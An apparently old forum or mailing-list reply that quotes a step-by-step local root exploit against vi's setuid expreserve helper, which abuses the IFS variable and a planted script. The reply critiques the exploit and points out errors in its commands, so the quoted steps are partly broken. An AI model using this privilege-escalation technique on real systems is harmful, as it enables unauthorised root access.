Charles Howes said...

> ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
> versions). Expreserve is setuid root. Expreserve runs /bin/mail
> with 'system()'. So, do the following:
> % cd /tmp
> % cp /bin/sh fubar
> % cat > bin
> chmod 4755 fubar
> ^D
> % chmod u+x fubar

I see a couple problems with the script so far. /bin/sh was copied to fubar while you are a regular user, so it will be owned by you and you'll end up with a nice copy of /bin/sh that's setuid to you, not your target user. Also, that last line should probably read 'chmod u+x bin', not fubar.

> % setenv IFS=/
> % vi
> :pre
> :q
> % fubar
> #
> Some versions of expreserve don't have the hole.
> Some versions of vi don't have the :pre command.
> One does not imply the other.

Thanks for posting it anyway.

- Chris